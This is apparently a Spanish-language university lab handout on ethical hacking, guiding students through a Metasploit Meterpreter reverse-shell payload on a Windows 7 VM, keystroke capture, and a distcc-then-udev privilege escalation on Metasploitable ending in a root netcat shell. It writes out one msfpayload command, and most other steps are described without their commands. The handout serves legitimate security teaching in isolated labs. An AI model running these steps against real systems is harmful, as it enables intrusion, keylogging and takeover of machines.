Está en la página 1de 10

Escuela de Informática y Telecomunicaciones

PDA
Actividad de Aprendizaje

ACTIVIDAD DE APRENDIZAJE
Carrera/s Ingeniería en Conectividad y Redes
Sigla Curso GRC 6501
Modalidad Presencial
Versión PDA 2014
Forma de trabajo x Individual
□ Grupal
□ Sala de clases
Infraestructura (lugar) x Laboratorio (especifique)
□ Terreno (especifique)
□ Otros (especifique)
- Computador personal por cada alumno
Material de apoyo (insumos y equipamiento) para la - Computador personal profesor
actividad - Máquina Virtual Kali

NOMBRE DE LA ACTIVIDAD
Explotación de vulnerabilidades
DESCRIPCIÓN DE LA ACTIVIDAD
El estudiante desarrolla en esta actividad las competencias para realizar un hacking ético a un
sistema vulnerable, con herramientas OPenSource

Introducción:
Las técnicas de Hacking Ético son utilizadas en las empresas, principalmente, para generar la
evidencia necesaria de que el sistema es vulnerable, por lo que el estudiante deberá realizar la
evaluación de seguridad y a continuación penetrar el sistema para generar las evidencias
necesarias

Desarrollo:
- Instalación de máquina virtual Kali Linux
- Ejecución de exploit multi/handler
- Uso de payload meterpreter
- Generación de evidencia con meterpreter
- Escalamiento de privilegios en servidores Linux

Evaluación (desarrollar en la pauta correspondiente)


Escuela de Informática y Telecomunicaciones
PDA
Actividad de Aprendizaje

Actividad práctica:

Formato: Individual

Asignatura: Gestion de Riesgos en Redes Corporativas

Código: GRC 6501

Objetivo: Realizar experiencia de exploit en Windows 7

1.- Levante la máquina virtual Windows 7 provista por su profesor, con la interfaz de red en modo
anfitrión

2.- Levante su máquina virtual Kali Linux en modo anfitrión

3.- Inicie la aplicación Metasploit

4.- Genere un virus con la aplicación "meterpreter" usando el siguiente comando:

# msf> msfpayload windows/meterpreter/reverse_tcp LHOST=ip_local X > nombre_virus

5.- Compruebe la creación del archivo con el comando:

# msf> ls -l
Escuela de Informática y Telecomunicaciones
PDA
Actividad de Aprendizaje

Servidor web para transferir el virus a la maquina victima

6.- Cree el directorio /var/www/share

7.- Cambie los permisos del directorio creado

8.- Cambie el propietario del directorio al usuario "www-data"

9.- A continuación levante el servicio web apache

10.- Copie el archivo del virus al directorio del servidor web


Escuela de Informática y Telecomunicaciones
PDA
Actividad de Aprendizaje

11.- Desde el browser de su máquina virtual Windows 7, conéctese al servidor web creado en su
máquina Kali Linux

12.- Baje el archivo del virus y cópielo a algún directorio local


Escuela de Informática y Telecomunicaciones
PDA
Actividad de Aprendizaje

Ejecución del exploit

13.- Desde la consola de metasploit, ejecute exploit/multi/handler

14.- Agregue el payload de "meterpreter" y configure la direccion Ip de su maquina local

15.- A continuación, ejecute el exploit


Escuela de Informática y Telecomunicaciones
PDA
Actividad de Aprendizaje

16.- En la máquina virtual Windows 7, ejecute el archivo de virus

17.- Observe la consola de metasploit

18.- Realice alguna operación de meterpreter, como lectura de teclado


Escuela de Informática y Telecomunicaciones
PDA
Actividad de Aprendizaje

Título: Escalamiento de privilegios

Escalamiento de privilegios en Linux

1.- Levante la aplicación Kali Linux con la interfaz de red en modo puente

2.- Instale la aplicación Metasploitable con la interfaz de red en modo puente

3.- Realice un footprinting al puerto de servicio 3632 en la maquina Metasploitable

4.- Ejecute la aplicación msfconsole en su máquina Kali y busque un exploit asociado al servicio
mencionado.

5.- Ejecute el exploit encontrado y configure los parámetros correspondientes:

6.- Busque un payload que permita ejecutar comandos en forma remota.


Escuela de Informática y Telecomunicaciones
PDA
Actividad de Aprendizaje

7.- Cargue el payload seleccionado y configure los parámetros adicionales.

8.- Ejecute el exploit confirme el usuario con el cual está conectado.

Hasta ahora, hemos logrado explotar la conexión remota, pero con un usuario de bajo privilegio.

9.- Ejecute el siguiente comando para visualizar el servicio "udev"

10.- Busque una vulnerabilidad, en el sitio CVE que permita lo siguiente:

- Vendor: kernel (Linux)

- Product: udev

- Public exploit: ok

- Vulnerability type: Gain Access

- Gained Access: Admin


Escuela de Informática y Telecomunicaciones
PDA
Actividad de Aprendizaje

11.- Busque el exploit, usando el código CVE, en el sitio:

http://www.exploit-db.com/search/

12.- Baje el exploit en su máquina víctima, usando el siguiente comando:

13.- A continuación renombre el archivo "index.html"

14.- Compile el exploit en la maquina victima


Escuela de Informática y Telecomunicaciones
PDA
Actividad de Aprendizaje

15.- Lea las instrucciones del exploit, del sitio exploit-db

16.- Cree el script como se muestra a continuación:

17.- A continuación, levante un túnel en el puerto 4444 en su máquina Kali Linux:

18.- Obtenga el PID del servicio udev

19.- Ejecute el exploit creado con el argumento adecuado (PID menos 1)

20.- Confirme en la ventana del túnel netcat, que puede conectarse con privilegios de root

21.- Responda:

¿Cuál fue la vulnerabilidad explotada en este caso?

¿Por qué razón es necesario primero realizar el acceso y luego conectarse como root?

También podría gustarte